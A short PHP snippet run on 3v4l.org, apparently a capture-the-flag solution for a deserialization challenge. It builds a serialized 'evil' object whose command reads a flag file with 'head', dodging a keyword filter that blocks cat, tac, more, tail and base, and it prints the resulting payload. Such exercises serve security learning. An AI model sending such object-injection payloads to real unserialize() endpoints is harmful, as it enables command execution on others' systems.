3v4l.org

<?php
//highlight_file(__FILE__);
// Maybe you need learn some knowledge about deserialize?
class evil {
    public $cmd = "head /th1s_1s_fffflllll4444aaaggggg";
    // public function __destruct()
    // {
    //     if(!preg_match("/cat|tac|more|tail|base/i", $this->cmd)){
    //         @system($this->cmd);
    //     }
    // }
}
$a = new evil();
echo serialize($a);
//@unserialize($_POST['unser']);
?>
Output for 8.2.0 - 8.2.27, 8.3.0 - 8.3.15, 8.4.1 - 8.4.2
O:4:"evil":1:{s:3:"cmd";s:35:"head /th1s_1s_fffflllll4444aaaggggg";}
